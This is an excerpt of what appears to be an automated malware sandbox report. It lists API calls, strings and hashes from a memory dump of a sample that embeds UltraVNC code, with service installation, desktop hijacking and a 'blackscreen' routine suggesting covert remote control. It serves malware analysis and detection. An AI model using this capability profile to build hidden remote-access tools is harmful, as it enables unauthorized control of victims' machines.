                                                      • API String ID: 181403729-1081969236
                                                      • Opcode ID: 356ec768b8f7f08761f25f9f6f5bd7aee8d03a8140df0f5e6c97a1197c639f56
                                                      • Instruction ID: 3691c3a5b8c9806fee4def4bfab76617d8b84ec0df80c06f0c4488f85c61cbab
                                                      • Opcode Fuzzy Hash: 356ec768b8f7f08761f25f9f6f5bd7aee8d03a8140df0f5e6c97a1197c639f56
                                                      • Instruction Fuzzy Hash: 466135A2A3859241EB38EB3494152F9B7A0FF46744FC4503AEA8E47795DE3CF14AD720
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000018.00000002.1546028684.00007FF790C31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF790C30000, based on PE: true
                                                      • Associated: 00000018.00000002.1546002801.00007FF790C30000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546211021.00007FF790D09000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546245952.00007FF790D3D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546331123.00007FF790D3F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790D40000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790D8B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790DB8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790DF1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790E64000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790EAC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_24_2_7ff790c30000_browser_sn.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Message$FindPostSendSleepWindowmouse_event$CloseCreateHandleThread
                                                      • String ID: blackscreen
                                                      • API String ID: 1419467151-1520931032
                                                      • Opcode ID: c13e5961689c7147809b67f205c06e05967d7aac8a0ba7f50e620ab93483d6c8
                                                      • Instruction ID: 3d8b8f9a4c2e9a7231cb66bda53ff70e0913ffd33642a1c9460ee36e21a3eda6
                                                      • Opcode Fuzzy Hash: c13e5961689c7147809b67f205c06e05967d7aac8a0ba7f50e620ab93483d6c8
                                                      • Instruction Fuzzy Hash: 66819272E3D682A2FB70AB35E4406B6AAA0BF86744FC81535DA5C06795CF2DF540C730
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000018.00000002.1546028684.00007FF790C31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF790C30000, based on PE: true
                                                      • Associated: 00000018.00000002.1546002801.00007FF790C30000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546211021.00007FF790D09000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546245952.00007FF790D3D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546331123.00007FF790D3F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790D40000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790D8B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790DB8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790DF1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790E64000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790EAC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_24_2_7ff790c30000_browser_sn.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: CriticalSection$Leave$EnterInvalidateRect
                                                      • String ID: Default$O$vncdesktop.cpp : Closing pending driver driver version$vncdesktop.cpp : Driver Used$vncdesktop.cpp : Driver option is enabled$vncdesktop.cpp : Shared memory mapped$vncdesktop.cpp : Start Mirror driver$vncdesktop.cpp : Start Mirror driver Failed$vncdesktop.cpp : Using non driver mode
                                                      • API String ID: 3829719269-2763606790
                                                      • Opcode ID: 5d513aa8406f826ec46c4d3060459385fd1a56e50c55edde39c3eb827b447b94
                                                      • Instruction ID: 6042f0d387f1f3c359cf65de2277772f2c051eb5e5c757c25ddd92c06624bc80
                                                      • Opcode Fuzzy Hash: 5d513aa8406f826ec46c4d3060459385fd1a56e50c55edde39c3eb827b447b94
                                                      • Instruction Fuzzy Hash: F5714876A28A8285E764EF35D4002EDB7A5FF89B44F884532DA0D5B398CF3CE445C760
                                                      APIs
                                                        • Part of subcall function 00007FF790C42FE0: GetModuleFileNameA.KERNEL32 ref: 00007FF790C43009
                                                        • Part of subcall function 00007FF790C42FE0: SetCurrentDirectoryA.KERNEL32 ref: 00007FF790C43041
                                                      • OpenSCManagerA.ADVAPI32 ref: 00007FF790C42D23
                                                      • CreateServiceA.ADVAPI32 ref: 00007FF790C42DB6
                                                      • GetLastError.KERNEL32 ref: 00007FF790C42DC4
                                                      • CloseServiceHandle.ADVAPI32 ref: 00007FF790C42DFB
                                                        • Part of subcall function 00007FF790C3A040: OpenInputDesktop.USER32(?,?,?,00007FF790C382D7), ref: 00007FF790C3A07A
                                                        • Part of subcall function 00007FF790C3A040: GetCurrentThreadId.KERNEL32 ref: 00007FF790C3A083
                                                        • Part of subcall function 00007FF790C3A040: GetThreadDesktop.USER32(?,?,?,00007FF790C382D7), ref: 00007FF790C3A08B
                                                        • Part of subcall function 00007FF790C3A040: SetThreadDesktop.USER32(?,?,?,00007FF790C382D7), ref: 00007FF790C3A0A6
                                                        • Part of subcall function 00007FF790C3A040: MessageBoxA.USER32 ref: 00007FF790C3A0B7
                                                        • Part of subcall function 00007FF790C3A040: SetThreadDesktop.USER32(?,?,?,00007FF790C382D7), ref: 00007FF790C3A0C2
                                                        • Part of subcall function 00007FF790C3A040: CloseDesktop.USER32(?,?,?,00007FF790C382D7), ref: 00007FF790C3A0CB
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000018.00000002.1546028684.00007FF790C31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF790C30000, based on PE: true
                                                      • Associated: 00000018.00000002.1546002801.00007FF790C30000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546211021.00007FF790D09000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546245952.00007FF790D3D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546331123.00007FF790D3F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790D40000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790D8B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790DB8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790DF1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790E64000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790EAC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_24_2_7ff790c30000_browser_sn.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Desktop$Thread$CloseCurrentOpenService$CreateDirectoryErrorFileHandleInputLastManagerMessageModuleName
                                                      • String ID: Failed to create a new service$Failed to open service control manager$Failed: Permission denied$Tcpip$UltraVNC$uvnc_service
                                                      • API String ID: 1695331641-1004021400
                                                      • Opcode ID: 6415f80341d9534cb3fadac7f1d9968ed7ad466c8fff1878714631192f384662
                                                      • Instruction ID: 64cdf5efc379ef221333926e0278f59e59383d2c61e24f19bb7d9b27ba00c550
                                                      • Opcode Fuzzy Hash: 6415f80341d9534cb3fadac7f1d9968ed7ad466c8fff1878714631192f384662
                                                      • Instruction Fuzzy Hash: 0C315671A28A4282EB24AB30E8412F9B3B1FF48744FC41035E98E42764DF6CF589CB20
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000018.00000002.1546028684.00007FF790C31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF790C30000, based on PE: true
                                                      • Associated: 00000018.00000002.1546002801.00007FF790C30000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546211021.00007FF790D09000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546245952.00007FF790D3D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546331123.00007FF790D3F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790D40000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790D8B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790DB8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790DF1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790E64000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790EAC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_24_2_7ff790c30000_browser_sn.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Library$AddressCreateDeleteDisplayEnumErrorFreeLastLoadProcSettings
                                                      • String ID: DISPLAY$EnumDisplayDevicesA$USER32$mv video hook driver2
                                                      • API String ID: 1846935786-1174184736
                                                      • Opcode ID: 90704b8816186510b2b91f08dfa5c235d54b69d90b2a5e6b12a0bf26ce9b4dd4
                                                      • Instruction ID: e3eea32e6f14dfe1a35e3c78ea9ce807b83a24436f26c0b08e029b595a127a49
                                                      • Opcode Fuzzy Hash: 90704b8816186510b2b91f08dfa5c235d54b69d90b2a5e6b12a0bf26ce9b4dd4
                                                      • Instruction Fuzzy Hash: 4F313C22A29A8295FB70EB31B8547AAB3A1FF8A744FC41135CA4E43794DF3CE105CB10
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000018.00000002.1546028684.00007FF790C31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF790C30000, based on PE: true
                                                      • Associated: 00000018.00000002.1546002801.00007FF790C30000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546211021.00007FF790D09000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546245952.00007FF790D3D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546331123.00007FF790D3F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790D40000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790D8B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790DB8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790DF1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790E64000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790EAC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_24_2_7ff790c30000_browser_sn.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: ImageLoadModule$BitsCreateDeleteFileHandleName
                                                      • String ID: ($DISPLAY$\background.bmp
                                                      • API String ID: 3125945695-1422902838
                                                      • Opcode ID: 5c990643eb74fd538b6b4e7c95b6f894b66b7c2a1e2628e0d5a9c6046c92dc90
                                                      • Instruction ID: b2f4d3093fbd84024fcd5aebcbcd2d128d2e18725c0dc5ab39b43941a6d2e913
                                                      • Opcode Fuzzy Hash: 5c990643eb74fd538b6b4e7c95b6f894b66b7c2a1e2628e0d5a9c6046c92dc90
                                                      • Instruction Fuzzy Hash: F4411036A28B8186E7709B34F8557AAB7B0FB89794F801235DA9D43B94DF3CE1158B10
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000018.00000002.1546028684.00007FF790C31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF790C30000, based on PE: true
                                                      • Associated: 00000018.00000002.1546002801.00007FF790C30000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546211021.00007FF790D09000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546245952.00007FF790D3D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546331123.00007FF790D3F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790D40000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790D8B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790DB8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790DF1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790E64000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790EAC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_24_2_7ff790c30000_browser_sn.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: File_set_error_mode$CurrentHandleModuleNameProcessWrite
                                                      • String ID: ...$<program name unknown>$Microsoft Visual C++ Runtime Library$Runtime Error!Program:
                                                      • API String ID: 2183313154-4022980321
                                                      • Opcode ID: cf5eef92c392be2f681cf437b81623491fac9973547c1d005ab3661ee4ff1334
                                                      • Instruction ID: 84f3bb0ac05c8c2eb55ee3d032f6367e87fc8caef7c433dab8b89aec78c4e775
                                                      • Opcode Fuzzy Hash: cf5eef92c392be2f681cf437b81623491fac9973547c1d005ab3661ee4ff1334
                                                      • Instruction Fuzzy Hash: 8F51BF21B286424AF634F735A4226FAA2A6BF86784FD44135EF5D02B85CF3CF5068625
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000018.00000002.1546028684.00007FF790C31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF790C30000, based on PE: true
                                                      • Associated: 00000018.00000002.1546002801.00007FF790C30000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546211021.00007FF790D09000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546245952.00007FF790D3D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546331123.00007FF790D3F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790D40000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790D8B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790DB8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790DF1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790E64000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790EAC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_24_2_7ff790c30000_browser_sn.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: PrivateProfile$CloseFileModuleNameOpenQueryValue
                                                      • String ID: NewMSLogon$Software\ORL\WinVNC3$UseRegistry$admin
                                                      • API String ID: 771632046-3493897170
                                                      • Opcode ID: 7e17a9a545862003f56dca8ab1949a50e46989200b9f0bc494998167346eab91
                                                      • Instruction ID: 5819e2a4899afd2b87f10566f1867f7fecfbdb729b79ad8802d0c43211796337
                                                      • Opcode Fuzzy Hash: 7e17a9a545862003f56dca8ab1949a50e46989200b9f0bc494998167346eab91
                                                      • Instruction Fuzzy Hash: E131EC31A29A8282EA70EB30F4557AAA3B0FB89754FC41135E64D46B54DF3DE505CB10
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000018.00000002.1546028684.00007FF790C31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF790C30000, based on PE: true
                                                      • Associated: 00000018.00000002.1546002801.00007FF790C30000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546211021.00007FF790D09000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546245952.00007FF790D3D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546331123.00007FF790D3F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790D40000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790D8B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790DB8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790DF1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790E64000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790EAC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_24_2_7ff790c30000_browser_sn.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Desktop$CloseCountCriticalInputLeaveOpenSectionTick
                                                      • String ID: vncclient.cpp : vncClientThread $vncservice.cpp : OpenInputdesktop2 NULL$vncservice.cpp : OpenInputdesktop2 OK$vncservice.cpp : SelectDesktop
                                                      • API String ID: 429868813-3977938048
                                                      • Opcode ID: 1ce61eda1815472dcf5eec9035d10c7bcc81b982fce4800f6686f7fc95f08c9b
                                                      • Instruction ID: 82c61e5cec8ee18b930505204ac7ca2662ee7fbab398196114d860fc6fdbb3c4
                                                      • Opcode Fuzzy Hash: 1ce61eda1815472dcf5eec9035d10c7bcc81b982fce4800f6686f7fc95f08c9b
                                                      • Instruction Fuzzy Hash: B7C1C026A2C69185F760AB35C8587FEABA1EF86B48F944131DA4C477A5CF3CF481C760
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000018.00000002.1546028684.00007FF790C31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF790C30000, based on PE: true
                                                      • Associated: 00000018.00000002.1546002801.00007FF790C30000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546211021.00007FF790D09000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546245952.00007FF790D3D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546331123.00007FF790D3F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790D40000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790D8B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790DB8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790DF1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790E64000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790EAC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_24_2_7ff790c30000_browser_sn.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: CreateRect$CombineDeleteObjectfree$malloc
                                                      • String ID:
                                                      • API String ID: 4067307076-0
                                                      • Opcode ID: 20d05e3cb4de81eeb824483ab4ff36b23af894bb04d54c932c434dd6306be1f0
                                                      • Instruction ID: 3be45d6e27d0b5484f4183f52264a0af5efced63a2e07d29985afa6d9add7162
                                                      • Opcode Fuzzy Hash: 20d05e3cb4de81eeb824483ab4ff36b23af894bb04d54c932c434dd6306be1f0
                                                      • Instruction Fuzzy Hash: F92260726186818BD724DF35E5406AEFBA2FB89784F445135EA8E87B58DB3CE941CF00
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000018.00000002.1546028684.00007FF790C31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF790C30000, based on PE: true
                                                      • Associated: 00000018.00000002.1546002801.00007FF790C30000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546211021.00007FF790D09000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546245952.00007FF790D3D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546331123.00007FF790D3F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790D40000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790D8B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790DB8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790DF1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790E64000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790EAC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_24_2_7ff790c30000_browser_sn.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: State$CriticalSection$EnterLeave
                                                      • String ID:
                                                      • API String ID: 1138030011-0
                                                      • Opcode ID: b876853db541de4715cda3d519086bd40b26c50766e7c8197b39221afb36b709
                                                      • Instruction ID: 4310669069dd063a675a2fc7fa7354efcd687e668f02fc3ec621db6c35077515
                                                      • Opcode Fuzzy Hash: b876853db541de4715cda3d519086bd40b26c50766e7c8197b39221afb36b709
                                                      • Instruction Fuzzy Hash: AB419226A28A5282F6217B31A50437AE6B2FF81356F811434ED8E037A08F3DF885C770
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000018.00000002.1546028684.00007FF790C31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF790C30000, based on PE: true
                                                      • Associated: 00000018.00000002.1546002801.00007FF790C30000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546211021.00007FF790D09000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546245952.00007FF790D3D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546331123.00007FF790D3F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790D40000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790D8B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790DB8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790DF1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790E64000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790EAC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_24_2_7ff790c30000_browser_sn.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: DesktopOpen$ClipboardCloseInput
                                                      • String ID: vncclient.cpp : vncClientThread $vncservice.cpp : OpenInputdesktop2 NULL$vncservice.cpp : OpenInputdesktop2 OK$vncservice.cpp : SelectDesktop
                                                      • API String ID: 2872304593-3977938048
                                                      • Opcode ID: c96e353cc41264b9558b101086f72bb72654cc8578bf969b8a62cc31f3abbd79
                                                      • Instruction ID: 38d889c047c21632c38d9ecad401de3c478fd561ee1a11757a8bbf4aae3df592
                                                      • Opcode Fuzzy Hash: c96e353cc41264b9558b101086f72bb72654cc8578bf969b8a62cc31f3abbd79
                                                      • Instruction Fuzzy Hash: 5712A236A2C6D185EB70AB35C8587FDA7A1EF86B88F844135DA4D4B795CF28F481C720
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000018.00000002.1546028684.00007FF790C31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF790C30000, based on PE: true
                                                      • Associated: 00000018.00000002.1546002801.00007FF790C30000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546211021.00007FF790D09000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546245952.00007FF790D3D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546331123.00007FF790D3F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790D40000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790D8B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790DB8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790DF1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790E64000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790EAC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_24_2_7ff790c30000_browser_sn.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Version$AddressHandleInfoModuleProcSystem
                                                      • String ID: GetNativeSystemInfo$kernel32.dll
                                                      • API String ID: 335284197-192647395
                                                      • Opcode ID: bd6ae27e489f82f31fcc2b20e4ae8107fd534e528a9ba4d17229ed8c41967507
                                                      • Instruction ID: d8630f22d0c942a120e0a55f5ff4e6397cd65eebab6e95ac0908c112a9df2015
                                                      • Opcode Fuzzy Hash: bd6ae27e489f82f31fcc2b20e4ae8107fd534e528a9ba4d17229ed8c41967507
                                                      • Instruction Fuzzy Hash: 3831EC21A2C58286EB70AB31B4553BAF3E1FF96704FC00035E68D86B95EF6CE4558B10
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000018.00000002.1546028684.00007FF790C31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF790C30000, based on PE: true
                                                      • Associated: 00000018.00000002.1546002801.00007FF790C30000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546211021.00007FF790D09000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546245952.00007FF790D3D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546331123.00007FF790D3F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790D40000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790D8B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790DB8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790DF1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790E64000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790EAC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_24_2_7ff790c30000_browser_sn.jbxd
                                                      Yara matches
                                                      Similarity
